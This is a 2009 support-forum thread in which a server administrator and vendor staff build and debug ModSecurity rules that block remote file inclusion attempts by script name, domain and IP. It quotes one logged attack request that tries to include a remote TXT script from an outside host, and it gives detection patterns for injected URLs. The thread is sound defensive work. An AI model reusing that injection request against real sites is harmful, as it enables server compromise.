Atomic Secure Linux
 Post subject: Rule for blocking name of scripts?
Posted: Thu Sep 03, 2009 12:44 pm
Forum User

Joined: Sat Jan 17, 2009 2:19 pm
Posts: 99
Hi,
I have seen that on my server a lot of attacks are trying to inject code from TXT files located on a remote server.

I have done some research and found the following:
Since March 22, 2009, my server has received 36,297 attacks of this type. Of these attacks only 21,506 were unique, so about 15,000 attacks were duplicates.

Also, all these attacks came from 3,131 different IPs, so that is about 10 different attacks from the same IP.
On the other hand, all these attacks involved 1,785 unique domains, so about 20 different types of TXT scripts were used on each domain.
And finally, my research found that only 456 script names were used.

So, my question is, what rule can I tweak in order to have a file called MALWARE_SCRIPT.TXT that checks the script file name first; if the name is not in there, then it checks MALWARE_BLACKLIST.TXT for the domain; if it is not there, then it checks the IP in MALWARE_IPBANNED.TXT; and if it is not there either, then it goes on to the other rules.

Is this possible?

I think this will make the security check faster on the server, as it will check the rules with the smallest files first.

Regards,
Sergio


 Post subject: Re: Rule for blocking name of scripts?
Posted: Thu Sep 03, 2009 2:24 pm
Atomicorp Staff - Site Admin

Joined: Thu Feb 07, 2008 7:49 pm
Posts: 3264
Location: Chantilly, VA
Sure, it is possible. And not a bad idea - please send me whatever list you put together, along with any domain names, logs, etc. you care to share.

So, on to your request, you can create the MALWARE_SCRIPT.TXT system by doing this:

1) Create a file called 9999_asl_local_malware.conf in /etc/httpd/modsecurity.d

2) Add this to the file:

SecRule REQUEST_URI "@pmFromFile malware-script.txt" \
    "capture,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:999999,rev:1,severity:2,msg:'Local Malware Script Blacklist: Malware Script detected in URL',logdata:'%{TX.0}'"

3) Create this file with your list of file names:

/etc/httpd/modsecurity.d/malware-script.txt

4) Make sure ALL the malware script names are in lowercase in that file (badscript.txt is OK, BadScript.txt is not). That rule automatically converts everything to lowercase to prevent evasion attacks like FoOBaR, fOObaR, etc.

5) Restart Apache

And please let us know how it works.

_________________
Michael Shinn
Atomicorp - Security For Everyone

Co-Author of Troubleshooting Linux Firewalls.


 Post subject: Re: Rule for blocking name of scripts?
Posted: Thu Sep 03, 2009 2:48 pm
Long Time Forum Regular

Joined: Thu Dec 09, 2004 11:19 am
Posts: 1876
Sergio -- excellent research. This is very useful.

Scott -- way to go! This will be very useful, I think, as an additional set of rules.

Feature request: Please can we have it as a disable-able option in the next ASL release?
Feature request reminder: Please can we have domain-blacklist.txt as a disable-able option in the next ASL release?

Thanks,

Faris.



 Post subject: Re: Rule for blocking name of scripts?
Posted: Thu Sep 03, 2009 3:58 pm
Forum User

Joined: Sat Jan 17, 2009 2:19 pm
Posts: 99
Thank you Mike, I will implement this rule on my server and I will let you know.

May I send you the info that I have to support@atomicorp.com, or do you have another email where I can send you the info?

@ Faris, thank you for your comments.

Regards,
Sergio


 Post subject: Re: Rule for blocking name of scripts?
Posted: Thu Sep 03, 2009 4:04 pm
Atomicorp Staff - Site Admin

Joined: Thu Feb 07, 2008 7:49 pm
Posts: 3264
Location: Chantilly, VA
Quote:
May I send you the info that I have to support@atomicorp.com, or do you have another email where I can send you the info?


That's a good place to send them. Also, on the offhand chance our collective antispam filters flag it as spam (with all those bad domains it might trip something), go ahead and zip it up and put a password on the zip file.

Faris:
Quote:
Feature request: Please can we have it as a disable-able option in the next ASL release?
Feature request reminder: Please can we have domain-blacklist.txt as a disable-able option in the next ASL release?


We'll discuss at the WAF GUI meeting how to manage this.

Right now you can disable the domain-blacklist rules by just running these commands:

asl -dr 300000
asl -dr 300001



 Post subject: Re: Rule for blocking name of scripts?
Posted: Thu Sep 03, 2009 4:40 pm
Forum User

Joined: Sat Jan 17, 2009 2:19 pm
Posts: 99
OK, the email is sent.

Regards,
Sergio


 Post subject: Re: Rule for blocking name of scripts?
Posted: Thu Sep 03, 2009 7:50 pm
Forum User

Joined: Sat Jan 17, 2009 2:19 pm
Posts: 99
OK, I have implemented the rule. I got an error at the beginning but it was fixed. I will post how this works.

Regards,
Sergio


 Post subject: Re: Rule for blocking name of scripts?
Posted: Thu Sep 03, 2009 9:16 pm
Forum User

Joined: Sat Jan 17, 2009 2:19 pm
Posts: 99
Well, after checking all the attacks that I have had since I implemented the new rule, it didn't work as I wanted.

Look at the following info:
Quote:
date:2009-09-03 20:00:47
IP: 204.3.129.73
GET: /blogweb//index.php?_REQUEST=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.0
HOST: SERVER.com
MOD SEC MESSAGE: Access denied with code 406 (phase 2). Matched phrase "204.3.129.73" at REMOTE_ADDR. [file "/usr/local/apache/conf/modsec_rules/00_asl_rbl.conf"] [line "6"] [id "350000"] [rev "2"] [msg "MY OWN BLACKLIST: IP is on My IPs Blacklist"] [severity "ERROR"]
MOD SEC ERROR: 406

I was expecting that the new rule would trigger a MATCHED PHRASE on the "id.txt" file name, but it continued with the following rule.

The good thing is that my other new rule with all the blacklisted IPs is working real nice.

Any idea of why it didn't catch the file name?

Regards,
Sergio


 Post subject: Re: Rule for blocking name of scripts?
Posted: Fri Sep 04, 2009 12:55 pm
Atomicorp Staff - Site Admin

Joined: Thu Feb 07, 2008 7:49 pm
Posts: 3264
Location: Chantilly, VA
Did the malwarescript rule come after your IP blacklist? If so, the first match wins and the process stops.



 Post subject: Re: Rule for blocking name of scripts?
Posted: Fri Sep 04, 2009 1:42 pm
Forum User

Joined: Sat Jan 17, 2009 2:19 pm
Posts: 99
mikeshinn wrote:
Did the malwarescript rule come after your IP blacklist? If so, the first match wins and the process stops.

Hi Mike,
No, the first rule that I have is the malwarescript one; look at my definitions:
Quote:
#Script Name Rules
Include /usr/local/apache/conf/modsec_rules/9999_asl_local_malware.conf

#My own IP blacklist
Include /usr/local/apache/conf/modsec_rules/00_asl_rbl.conf

#Whitelisting Rules
Include /usr/local/apache/conf/modsec_rules/00_asl_whitelist.conf

#Exclusion Rules
Include /usr/local/apache/conf/modsec_rules/05_asl_exclude.conf

#Scan uploaded files with clamav
Include /usr/local/apache/conf/modsec_rules/05_asl_scanner.conf

#Malware Blacklist Rules
Include /usr/local/apache/conf/modsec_rules/10_asl_antimalware.conf

#Web Application Protection Rules
Include /usr/local/apache/conf/modsec_rules/10_asl_rules.conf

#New rule for credit cards
Include /usr/local/apache/conf/modsec_rules/11_asl_data_loss.conf

#Bad Useragent Signatures
Include /usr/local/apache/conf/modsec_rules/20_asl_useragents.conf

#Additional Malware Blacklisting Rules
Include /usr/local/apache/conf/modsec_rules/30_asl_antimalware.conf

#Anti-spam Signatures
Include /usr/local/apache/conf/modsec_rules/30_asl_antispam.conf
Include /usr/local/apache/conf/modsec_rules/30_asl_antispam_referrer.conf

#Enhanced Apache 2.x rules
Include /usr/local/apache/conf/modsec_rules/40_asl_apache2-rules.conf

#Anti Rootkit Signatures
Include /usr/local/apache/conf/modsec_rules/50_asl_rootkits.conf

#"Google Hacks" signatures
Include /usr/local/apache/conf/modsec_rules/60_asl_recons.conf

Include /usr/local/apache/conf/modsec_rules/98_asl_jitp.conf

Include /usr/local/apache/conf/modsec_rules/99_asl_exclude.conf

#Just In Time Patches
Include /usr/local/apache/conf/modsec_rules/99_asl_jitp.conf

#Trusted domains
Include /usr/local/apache/conf/modsec_rules/trusted-domains.conf

As you can see, it is the first rule in my config file. What else could be my error?

Regards,
Sergio


 Post subject: Re: Rule for blocking name of scripts?
Posted: Sat Sep 05, 2009 8:26 am
Atomicorp Staff - Site Admin

Joined: Thu Feb 07, 2008 7:49 pm
Posts: 3264
Location: Chantilly, VA
It looks like you have your own configs, so it's hard to say what could be wrong. You may have something wrong in your defaultaction, so start with a very simple rule and make sure you can get that to work first:

SecRule REQUEST_URI /foobar

If that doesn't block, then you have something wrong with your fundamental configuration, and I'd recommend you use our configuration, which is tested and works.

Here's an updated version of the injection rule if you want to keep it limited to just the actual injection cases:

#Master list of known malware script file names
SecRule REQUEST_URI "(?:ogg|gopher|zlib|(?:ht|f)tps?)\:/" \
"chain,capture,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390500,rev:1,severity:2,msg:'Atomicorp.com Malware Script Blacklist: Malware Script detected in URL',logdata:'%{TX.0}'"
SecRule REQUEST_URI "@pmFromFile malware_scripts.txt"

One thing to keep in mind: you probably don't need this rule, because with URL injections there is already a global set of rules to catch injections. So where you might have better luck is with ARGS, but you run a higher chance of false positives.



 Post subject: Re: Rule for blocking name of scripts?
Posted: Sat Sep 05, 2009 12:11 pm
Forum User

Joined: Sat Jan 17, 2009 2:19 pm
Posts: 99
Michael,
I thought that I had your configuration, lol. It is a little bit modified as my server is cPanel, but basically all the rules are the same.

If you don't mind, can you point me to where your configuration is, so I can set it up on my server? BIG THANKS.

On the other hand, maybe if I explain to you what I intend to do with this rule, you can tell me if I am wrong about what I want...

Take as an example the following action:
Code:
/blogweb//index.php?_REQUEST=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.0


0. (Check the whitelist first and stop any further checks.)
1. So, for me it will be easier to start checking from the end, so the first part to test on the action is to search for "/id.txt?"; if it is found in malware-script.txt, then the process stops and gives a 406 error.
2. If the script wasn't found, then we can check for the domain name "civitatis.superweb.ws/"; if it is located in malware-blacklist.txt, then the process stops and gives a 406 error.
3. Then check for blacklisted IPs in malware-blacklistIP.txt; if the connection IP is located there, stop the process and give a 406 error.
4. If all the above fail, continue with the other rules.

What I intend to do is to check for the faster things first: the script file is the smallest of all the malware files and is also, in my case, the most used, as a lot of the hack attempts are the ones that try to inject code via scripts.

Am I wrong?


 Post subject: Re: Rule for blocking name of scripts?
Posted: Sat Sep 05, 2009 12:43 pm
Forum User

Joined: Sat Jan 17, 2009 2:19 pm
Posts: 99
Quote:
On your other rule, the malware script, I think your problem is that you are just missing a default action and the phase in which the rule runs. All our rule file sets define their phases and actions, sometimes in the rules and always as a default action, so any custom rules after ours always inherit these conditions. If you are loading your rules before ours, then you need to define an action for the system to take when the rule matches and the phase in which the rule should act. Either in the rule itself:

#Master list of known malware script file names
SecRule REQUEST_URI "(?:ogg|gopher|zlib|(?:ht|f)tps?)\:/" \
"deny,log,phase:2,chain,capture,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390500,rev:1,severity:2,msg:'Atomicorp.com Malware Script Blacklist: Malware Script detected in URL',logdata:'%{TX.0}'"
SecRule REQUEST_URI "@pmFromFile malware_scripts.txt"

Or set it as a default before the rule:

SecDefaultAction "log,deny,auditlog,phase:2,status:403,t:lowercase,t:replaceNulls,t:compressWhitespace"

Thank you Mike,
I will try this new rule and see how this works.

Regards,
Sergio


 Post subject: Re: Rule for blocking name of scripts?
Posted: Sat Sep 05, 2009 3:59 pm
Atomicorp Staff - Site Admin

Joined: Thu Feb 07, 2008 7:49 pm
Posts: 3264
Location: Chantilly, VA
And don't forget to try some even simpler rules just so you can get the hang of the basic principles of actions and phases. If you can get those to fire, then work up to more complex rules; that way you can reduce the variables involved in troubleshooting. Once the basics are working you can rule them out as the root cause of the problem and jump to more complex rules, then more complex expressions, etc.

Reduce the variables = Reduce the effort troubleshooting.



 Post subject: Re: Rule for blocking name of scripts?
Posted: Sat Sep 05, 2009 6:42 pm
Forum User

Joined: Sat Jan 17, 2009 2:19 pm
Posts: 99
Hello Mike,
You know, I have set the script rule on two different servers, and on one it is working and on the other (the first one where I set the new rule) it is not. For sure it has to be something in my configuration, but I can't find where it is; I will do more research.

On the other hand, I have been blocking hundreds of attacks lately and the data I am gathering from them is really nice. I have a lot of IPs where the attacks are coming from; my rule for blocking IPs is working real nice, and I have decided to put up this 406 sign:
Attachment: 406.jpg

Do you think it will attract more attacks? lol

Regards,
Sergio

